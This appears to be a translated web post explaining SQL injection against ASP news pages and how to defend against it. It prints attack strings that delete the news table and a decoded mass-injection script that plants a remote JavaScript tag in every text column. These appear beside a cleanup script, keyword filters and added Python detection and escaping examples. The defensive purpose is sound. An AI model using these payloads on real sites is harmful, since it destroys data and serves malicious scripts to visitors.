SQL injection attacks using binary code

Source: Internet
Author: User
-- Update 01/03 am --
The code turns out to be nothing new; I just want to reheat an old dish from a few years ago. Years have passed, some people may have grown careless, and others may be trying the same tricks again.
Of the injection patterns, numeric fields are the easiest to inject. Text fields can be injected too, but text querystring parameters are far less common than numeric ones.
The most common case is news.asp?id=3
In ASP, the commonly overlooked code looks like this:
aspid = Request("id")
sql = "select * from news where id=" & aspid
Set rs = conn.Execute(sql)
The id here is completely unprotected; if the value is taken as a string, injection is easy.
For example, id=3;delete%20from%20news;
which deletes every record in the news table.
For text, e.g. news.asp?keyword=abc:
aspkeyword = Request("keyword")
sql = "select * from news where title like '%" & aspkeyword & "%'"
The injection goes into keyword, which is wrapped in single quotes, so the attacker closes the quote and appends a crafted SQL statement that tricks the original code.
For example, keyword=abc';delete from news;select * from sysobject where something like '%
This is considerably more trouble than the id case.
 
Much of the code in the material below actually exists to get around keywords blocked by anti-injection programs.
I have read several anti-injection programs; they usually work by filtering, for example:
SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|daxia123|<script|</script>"
SQL_inj = Split(SQL_injdata, "|")
If the binary (hex-encoded) code below is used and the keywords are written in mixed case, such a program is bypassed.
So the check still has to be strict about where a value comes from (querystring or form) and whether it is expected to be a number or text.
If a number is required, use the IsNumeric() function to check it and reject anything that is not numeric.
For text, check for single quotes and replace each one with two single quotes; in ASP, the first of the two quotes then acts as an escape.
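As an added example that is not part of the original post, here are the two ASP patterns above (news.asp?id=3 and news.asp?keyword=abc) rebuilt in Python over an in-memory SQLite table, with the concatenated query beside the checks the post recommends (IsNumeric for numbers, doubled single quotes for text) and a parameterized query as the stronger option. The table, its rows and the function names are constructed for this example.

```python
# Added example, not code from the original post. The news table, its rows
# and all function names below are constructed for illustration.
import sqlite3


def make_db():
    """Constructed sample data: a tiny news table like the one news.asp queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer primary key, title text)")
    conn.executemany(
        "insert into news (id, title) values (?, ?)",
        [(1, "abc news"), (2, "other story"), (3, "third item")],
    )
    conn.commit()
    return conn


def remaining_rows(conn):
    """Row count, used to show whether an appended DELETE actually ran."""
    return conn.execute("select count(*) from news").fetchone()[0]


def query_by_id_vulnerable(conn, raw_id):
    """The unprotected ASP pattern: the request value is pasted into the SQL
    text. executescript mirrors conn.Execute in that it runs everything in the
    string, including any statement the caller appended. Returns the number of
    rows left afterwards."""
    sql = "select * from news where id=" + raw_id
    conn.executescript(sql)
    return remaining_rows(conn)


def parse_numeric_id(raw_id):
    """The post's rule for numeric fields (IsNumeric() in ASP): accept only a
    plain integer. Returns the integer, or None when the value is rejected."""
    value = raw_id.strip()
    return int(value) if value.isdigit() else None


def query_by_id_safe(conn, raw_id):
    """Numeric check first, then a bound parameter; an id such as
    '3; delete from news' never reaches the database."""
    news_id = parse_numeric_id(raw_id)
    if news_id is None:
        return None  # the caller rejects the request
    return conn.execute("select id, title from news where id=?", (news_id,)).fetchall()


def escape_single_quotes(text):
    """The post's rule for text fields: double every single quote so it stays
    a literal character inside the quoted SQL string."""
    return text.replace("'", "''")


def query_by_keyword_escaped(conn, keyword):
    """LIKE search still built by concatenation, but with quotes doubled; the
    attacker's closing quote becomes part of the pattern instead of ending it."""
    sql = ("select id, title from news where title like '%"
           + escape_single_quotes(keyword) + "%'")
    return conn.execute(sql).fetchall()


def query_by_keyword_param(conn, keyword):
    """Stronger option: bind the pattern as a parameter so user input is never
    parsed as SQL syntax at all."""
    return conn.execute(
        "select id, title from news where title like ?", ("%" + keyword + "%",)
    ).fetchall()


if __name__ == "__main__":
    print(query_by_id_vulnerable(make_db(), "3; delete from news;"))  # 0 rows left
    print(query_by_id_safe(make_db(), "3; delete from news;"))        # None
    print(query_by_keyword_param(make_db(), "abc"))                    # [(1, 'abc news')]
```

Doubling quotes only protects a value that is itself inside a quoted literal, which is why the numeric case needs the type check instead; binding parameters covers both cases without depending on the escaping being done everywhere.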

Looking at the articles below, a lot of the code has been decoded; the analysis still rests on the principles above, so the blocking method has not changed.

-- The following content comes from --

http://bbs.360safe.com/viewthread.php?tid=606369
http://blog.csdn.net/songz210/archive/2009/01/01/3663861.aspx
http://bbs.ikaka.com/showtopic-8580913-5.aspx

Intercepted source of the injection attack:

declare%20@s%20varchar(4000)%20set%20@s=cast(Bytes%20as%20varchar(4000));exec(@s)
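Added here as an example that is not part of the original post or the cited forum threads: a Python decoder for the cast(0x... as varchar(4000)) shape shown above, written the way an incident responder would run it over web server logs to see what an encoded request actually carried. The log lines, the hex bytes and the function names are constructed for this example; the decoded text is a harmless SELECT, not the script-injection payload the threads describe.

```python
# Added example, not code from the original post. Log lines, the hex payload
# and all function names are constructed for illustration.
import re
from urllib.parse import unquote

# Constructed sample: a harmless statement hex-encoded the same way the
# intercepted request encodes its payload (cast(0x... as varchar(4000))).
SAMPLE_SQL = "select name from sysobjects where xtype='U'"
SAMPLE_HEX = SAMPLE_SQL.encode("ascii").hex()

# Constructed web server log lines: a normal request and one carrying the
# encoded shape above with mixed-case keywords and %20 for spaces.
SAMPLE_LOG = [
    "2009-01-01 10:00:00 GET /news.asp id=3 200",
    "2009-01-01 10:00:05 GET /news.asp id=3;DeClArE%20@s%20VarChar(4000)%20sEt%20@s="
    "CaSt(0x" + SAMPLE_HEX + "%20As%20VarChar(4000));ExEc(@s) 200",
]

# cast(0x<hex> as varchar(N)) or nvarchar(N), matched after URL decoding.
CAST_HEX = re.compile(
    r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+(n?)varchar\s*\(\s*\d+\s*\)\s*\)", re.I
)

KEYWORDS = ("declare", "exec", "select", "delete", "update")


def naive_filter_hits(raw):
    """A case-sensitive keyword check on the raw, still URL-encoded value:
    the kind of filter the post says the encoded, mixed-case form slips past."""
    return [k for k in KEYWORDS if k in raw]


def decode_cast_payloads(raw):
    """URL-decode the value, then turn every cast(0x... as varchar) argument
    back into text. nvarchar payloads are UTF-16LE, varchar ones single-byte."""
    decoded = unquote(raw)
    payloads = []
    for match in CAST_HEX.finditer(decoded):
        hexdigits, is_nvarchar = match.group(1), match.group(2)
        # A truncated log line can leave an odd nibble; drop it rather than fail.
        hexdigits = hexdigits[: len(hexdigits) // 2 * 2]
        data = bytes.fromhex(hexdigits)
        codec = "utf-16-le" if is_nvarchar else "latin-1"
        payloads.append(data.decode(codec, errors="replace"))
    return payloads


def decoded_keyword_hits(raw):
    """The same keyword list applied after URL decoding, lower-casing and hex
    decoding, which is the form a detector actually has to inspect."""
    text = unquote(raw).lower() + " " + " ".join(decode_cast_payloads(raw)).lower()
    return sorted(k for k in KEYWORDS if k in text)


def scan_log(lines):
    """Return (line, decoded payloads) for every request that carries a
    cast(0x...) payload, so an analyst can read what was really sent."""
    findings = []
    for line in lines:
        payloads = decode_cast_payloads(line)
        if payloads:
            findings.append((line, payloads))
    return findings


if __name__ == "__main__":
    for line, payloads in scan_log(SAMPLE_LOG):
        print(line)
        for p in payloads:
            print("  decoded:", p)
```

The point of the two keyword functions is the contrast: the raw request trips none of the lower-case keywords, while the decoded form exposes declare, exec and the SELECT inside the hex. A filter or a log rule therefore has to normalise case and decode before it compares.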

 

Decoded source code

declare @t varchar(255), @c varchar(255)
declare table_cursor cursor for
    select a.name, b.name from sysobjects a, syscolumns b
    where a.id = b.id and a.xtype = 'U'
      and (b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167)
open table_cursor
fetch next from table_cursor into @t, @c
while (@@fetch_status = 0)
begin
    exec('update [' + @t + '] set [' + @c + '] = rtrim(convert(varchar(4000), [' + @c + '])) + ''<script src=http://cn.jxmmtv.com/cn.js></script>''')
    fetch next from table_cursor into @t, @c
end
close table_cursor
deallocate table_cursor

 

Fix code by float cloud @ http://bbs.ikaka.com/showtopic-8580913-4.aspx#9261365

Note: this does not work for ntext and text columns.

/*********** Define the string to be removed. Note that there may be
more than one; on my server, for instance, I found two. ************/
declare @delstr nvarchar(500)
set @delstr = '<script src=http://cn.inputthedamnwebsitedomainhere.cn/cn.js></script>'
/*****************************************************************/
set nocount on

declare @tablename nvarchar(100), @columnname nvarchar(100), @tbid int, @irow int, @iresult int
declare @sql nvarchar(500)

set @iresult = 0
declare cur cursor for
    select name, id from sysobjects where xtype = 'U'

open cur
fetch next from cur into @tablename, @tbid

while @@fetch_status = 0
begin
    declare cur1 cursor for
        -- xtype in (231,167,239,175) covers the char, varchar, nchar and nvarchar types
        select name from syscolumns where xtype in (231,167,239,175)
            and id = @tbid
    open cur1
    fetch next from cur1 into @columnname
    while @@fetch_status = 0
    begin
        -- build: update [t] set [c] = replace([c], '<delstr>', '') where [c] like '%<delstr>%'
        set @sql = 'update [' + @tablename + '] set [' + @columnname + '] = '
                 + 'replace([' + @columnname + '], ''' + @delstr + ''', '''') where '
                 + '[' + @columnname + '] like ''%' + @delstr + '%'''
        exec sp_executesql @sql
        set @irow = @@rowcount
        set @iresult = @iresult + @irow
        if @irow > 0
        begin
            print 'table: ' + @tablename + ', column: ' + @columnname + ' has been updated with ' + convert(varchar(10), @irow) + ' record(s);'
        end
        fetch next from cur1 into @columnname
    end
    close cur1
    deallocate cur1

    fetch next from cur into @tablename, @tbid
end
print 'the database has ' + convert(varchar(10), @iresult) + ' record(s) updated.'

close cur
deallocate cur
set nocount off
/***** The above is the operating body ******/

Related suggestions by xutingxin
@ http://bbs.ikaka.com/showtopic-8580913-5.aspx#9261798
Solution: 1. Strictly filter the content obtained from Request.Form and Request.QueryString. Use Request("name") to obtain values; do not use cookies to store content that goes into SQL statements querying the database.
2. Important user data should be verified through the session whenever possible, because the session lives on the server side and the client cannot forge it unless it has permissions on your server.

You can use the following code to filter GET, POST and cookie input and block SQL injection attacks:

<%
Response.Buffer = True  ' buffer the page
' prevent GET injection
If Request.QueryString <> "" Then StopInjection(Request.QueryString)
' prevent POST injection
If Request.Form <> "" Then StopInjection(Request.Form)
' prevent cookie injection
If Request.Cookies <> "" Then StopInjection(Request.Cookies)
' regular-expression filter subroutine
Function StopInjection(values)
    Dim regEx
    Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    ' block a quote, semicolon or hash anywhere, or a SQL keyword preceded by whitespace, +, ( or )
    regEx.Pattern = "'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|return|as|go|exists)[\s\b+]*)"
    Dim sItem, sValue
    For Each sItem In values
        sValue = values(sItem)
        If regEx.Test(sValue) Then
            Response.Write "<script language=JavaScript>alert('Invalid injection! Your behavior has been recorded!!');history.back(-1);</script>"
            Response.End
        End If
    Next
    Set regEx = Nothing
End Function
%>

Save the code above as a file, e.g. antisql.asp, and include it at the top of the database connection file with <!-- #include file="antisql.asp" --> to block SQL injection attacks.
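To see what the antisql.asp filter above actually accepts and rejects, here is its regular expression ported to Python's re module and run over constructed sample values (an added example, not code from the post or from the author of antisql.asp). The request mapping, its values and the function names are constructed for this example.

```python
# Added example, not code from the original post. The sample request values
# and the function names are constructed for illustration.
import re

# The antisql.asp pattern, unchanged apart from Python string quoting. Inside a
# character class both JScript-style RegExp and Python's re read \b as the
# backspace character, so [\s\b+()] means "whitespace, backspace, +, ( or )".
ANTISQL_PATTERN = re.compile(
    r"'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter"
    r"|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|return"
    r"|as|go|exists)[\s\b+]*)",
    re.I,
)


def is_blocked(value):
    """True when antisql.asp would send the block page for this value
    (RegExp.Test semantics: any match anywhere in the string)."""
    return ANTISQL_PATTERN.search(value) is not None


def classify(values):
    """Run the filter over a mapping standing in for Request.QueryString and
    return the names of the fields that would trigger the block."""
    return sorted(name for name, value in values.items() if is_blocked(value))


# Constructed inputs: the two payload shapes the post describes, ordinary
# values that should pass, and ordinary text that the keyword list rejects.
SAMPLE_REQUEST = {
    "id": "3",                                  # numeric id: passes
    "keyword": "abc",                           # plain search term: passes
    "city": "New York",                         # passes
    "inject_id": "3;delete from news",          # blocked: ';' and ' delete'
    "inject_kw": "abc'; delete from news",      # blocked: the single quote
    "comment": "fish and chips",                # false positive: ' and'
    "phrase": "call me (as soon as possible)",  # false positive: '(as'
}


if __name__ == "__main__":
    for name, value in SAMPLE_REQUEST.items():
        print(f"{name:10s} {'BLOCKED' if is_blocked(value) else 'ok':8s} {value!r}")
```

The two false positives are the practical cost of a keyword blacklist: any free-text field containing "and", "or", "as", "if" or "end" after a space is rejected. That is why the post's own advice, deciding per parameter whether a number or text is expected and validating against that, is the check that actually holds, with the regex at most as a second layer.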
